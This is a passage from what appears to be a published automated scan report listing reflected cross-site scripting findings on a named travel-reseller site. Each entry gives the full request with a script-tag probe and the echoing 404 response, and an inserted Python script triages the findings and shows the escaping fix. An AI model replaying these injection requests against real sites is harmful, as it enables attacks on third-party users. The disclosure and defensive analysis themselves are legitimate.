Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmosb9346<script>alert(1)</script>d49ef4831b1/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4848. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 282db<script>alert(1)</script>d09435b8890 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images282db<script>alert(1)</script>d09435b8890/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images282db<script>alert(1)</script>d09435b8890/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.4849. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2778a<script>alert(1)</script>a9a0cf7aaf5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating2778a<script>alert(1)</script>a9a0cf7aaf5/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating2778a<script>alert(1)</script>a9a0cf7aaf5/5.gif was not found on this server.</p>
...[SNIP]...

2.4850. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f6e21<script>alert(1)</script>02b64272d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/5.giff6e21<script>alert(1)</script>02b64272d1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/5.giff6e21<script>alert(1)</script>02b64272d1 was not found on this server.</p>
...[SNIP]...

2.4851. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bac4<script>alert(1)</script>2b9596dde1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/5.gif?1bac4<script>alert(1)</script>2b9596dde1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/5.gif?1bac4<script>alert(1)</script>2b9596dde1b=1 was not found on this server.</p>
...[SNIP]...

2.4852. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68448<script>alert(1)</script>31aba6339bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation68448<script>alert(1)</script>31aba6339bb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation68448<script>alert(1)</script>31aba6339bb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4853. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c733a<script>alert(1)</script>ce47fbbd3ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themesc733a<script>alert(1)</script>ce47fbbd3ea/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themesc733a<script>alert(1)</script>ce47fbbd3ea/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4854. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 320ed<script>alert(1)</script>ec99da40cb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos320ed<script>alert(1)</script>ec99da40cb4/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos320ed<script>alert(1)</script>ec99da40cb4/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4855. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b9176<script>alert(1)</script>17d4b0c740b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/imagesb9176<script>alert(1)</script>17d4b0c740b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/imagesb9176<script>alert(1)</script>17d4b0c740b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4856. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f16ff<script>alert(1)</script>a9bffa82e26 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/ratingf16ff<script>alert(1)</script>a9bffa82e26/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/ratingf16ff<script>alert(1)</script>a9bffa82e26/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4857. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5eae3<script>alert(1)</script>50371247eb2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php5eae3<script>alert(1)</script>50371247eb2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php5eae3<script>alert(1)</script>50371247eb2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4858. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3dade<a>d125ebe00bd was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3dade<a>d125ebe00bd&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3dade<a>d125ebe00bd&opt=2 was not found on this server.</p>
...[SNIP]...

2.4859. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload dd195<a>b06b45bf5c6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...dd195<a>b06b45bf5c6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...dd195<a>b06b45bf5c6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4860. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3227<script>alert(1)</script>a0b79820419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e3227<script>alert(1)</script>a0b79820419=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e3227<script>alert(1)</script>a0b79820419=1 was not found on this server.</p>
...[SNIP]...

2.4861. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4e6b7<a>64a22a6ac21 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24e6b7<a>64a22a6ac21 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24e6b7<a>64a22a6ac21 was not found on this server.</p>
...[SNIP]...
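
Added example, not part of the XSS.CX report, the Burp scanner output or the target site's code: a small Python triage script for the entries above. Every entry from 2.4845 through 2.4861 shows the same sink, the 404 error page's "The requested URL ... was not found on this server." paragraph echoing the request URI without HTML encoding, so the findings can be re-checked offline from the saved request/response pairs. The script reproduces the scanner's canary logic (a hex prefix and suffix around the probe), classifies how the probe comes back in the body, maps that to the report's Certain/Firm wording (a live <script> element versus a bare <a> tag; the report does not say why only the tag probe reflected in the keyword, Submit3 and opt values), and shows the result once the URI is entity-encoded before insertion, which is what htmlspecialchars() does in PHP. The sample bodies are copied from entries 2.4852 and 2.4858; render_404(), the browser-style percent-encoded variant and the safe= character sets are assumptions for illustration. One caveat the report does not settle: the scanner sent the angle brackets raw in the request line, and whether a link clicked in a modern browser (which percent-encodes < and > in the path) reproduces the reflection depends on whether the server decodes the path before echoing it; the script's "percent-encoded" class is the inert outcome of that case.

```python
"""Offline triage of reflected-URL findings in a 404 error page.

Added example; not code from the XSS.CX report, Burp Suite or the
target site. Sample bodies are copied from report entries 2.4852
and 2.4858; everything else is an assumption for illustration.
"""
import html
import re
from urllib.parse import quote

# Scanner payloads are a probe wrapped in a random hex prefix and
# suffix, e.g. 68448<script>alert(1)</script>31aba6339bb, so the
# reflection can be located exactly in the response body.
PROBE_RE = re.compile(r"([0-9a-f]+)(<.+>)([0-9a-f]+)")


def split_probe(payload):
    """Return (prefix, probe, suffix) for a canary-wrapped payload."""
    m = PROBE_RE.fullmatch(payload)
    if m is None:
        raise ValueError("not a canary-wrapped payload: %r" % payload)
    return m.group(1), m.group(2), m.group(3)


def classify_reflection(payload, body):
    """How does the probe come back in the HTML body?

    'unmodified'      prefix+probe+suffix verbatim: the tags are live
    'entity-encoded'  < and > returned as &lt; and &gt;: inert
    'percent-encoded' < and > returned as %3C and %3E: inert as HTML
    'stripped'        prefix and suffix adjacent: the tag was removed
    'absent'          the canary is not in the body at all
    """
    prefix, probe, suffix = split_probe(payload)
    if prefix + probe + suffix in body:
        return "unmodified"
    if prefix + html.escape(probe) + suffix in body:
        return "entity-encoded"
    # safe="/()" approximates what a browser leaves unencoded in a path
    # (assumption; browsers differ in detail).
    if prefix + quote(probe, safe="/()") + suffix in body:
        return "percent-encoded"
    if prefix + suffix in body:
        return "stripped"
    return "absent"


def confidence(payload, body):
    """Map the reflection to the report's confidence wording.

    A live <script> element is a complete proof of concept (Certain).
    A bare <a> only proves that new tags can be injected (Firm), which
    is why the report asks for manual follow-up on those entries.
    """
    if classify_reflection(payload, body) != "unmodified":
        return "none"
    probe = split_probe(payload)[1]
    return "Certain" if probe.lower().startswith("<script") else "Firm"


def render_404(request_uri, escape):
    """Assumed shape of the site's 404 template (the report shows only
    the <p> line). With escape=True the URI is entity-encoded before
    insertion, the equivalent of PHP htmlspecialchars() at the sink."""
    shown = html.escape(request_uri, quote=True) if escape else request_uri
    return "<p>The requested URL %s was not found on this server.</p>" % shown


# Copied from entry 2.4852 (REST URL parameter 1, Confidence: Certain).
PAYLOAD_2_4852 = "68448<script>alert(1)</script>31aba6339bb"
URI_2_4852 = ("/travel-vaccation" + PAYLOAD_2_4852
              + "/themes/kosmos/images/rating/search.php"
              + "?keyword=search...&Submit3=Search&opt=2")
BODY_2_4852 = ("<p>The requested URL " + URI_2_4852
               + " was not found on this server.</p>")

# Copied from entry 2.4858 (Submit3 parameter, Confidence: Firm).
PAYLOAD_2_4858 = "3dade<a>d125ebe00bd"
BODY_2_4858 = ("<p>The requested URL /travel-vaccation/themes/kosmos/images"
               "/rating/search.php?keyword=search...&Submit3=Search"
               + PAYLOAD_2_4858 + "&opt=2 was not found on this server.</p>")

# Constructed: the same URI after the sink is entity-encoded, and after
# a browser has percent-encoded the angle brackets in the path.
BODY_FIXED = render_404(URI_2_4852, escape=True)
BODY_BROWSER = render_404(quote(URI_2_4852, safe="/?&=()"), escape=False)

if __name__ == "__main__":
    for label, payload, body in [
        ("2.4852 as reported", PAYLOAD_2_4852, BODY_2_4852),
        ("2.4858 as reported", PAYLOAD_2_4858, BODY_2_4858),
        ("2.4852 after escaping", PAYLOAD_2_4852, BODY_FIXED),
        ("2.4852 via browser", PAYLOAD_2_4852, BODY_BROWSER),
    ]:
        print("%-22s %-16s %s" % (label, classify_reflection(payload, body),
                                  confidence(payload, body)))
```

Run it as a script to see the four rows; reuse classify_reflection() on any other saved request/response pair from this report by pasting the payload from its "Issue detail" line and the response's <p> line. The "stripped" and "absent" classes exist so that a re-test after a fix distinguishes a real encoding fix from a tag filter, which the report's Firm entries suggest may be present for some parameter values.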

2.4862. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e880a<script>alert(1)</script>81c0f0d4b4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccatione880a<script>alert(1)</script>81c0f0d4b4a/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
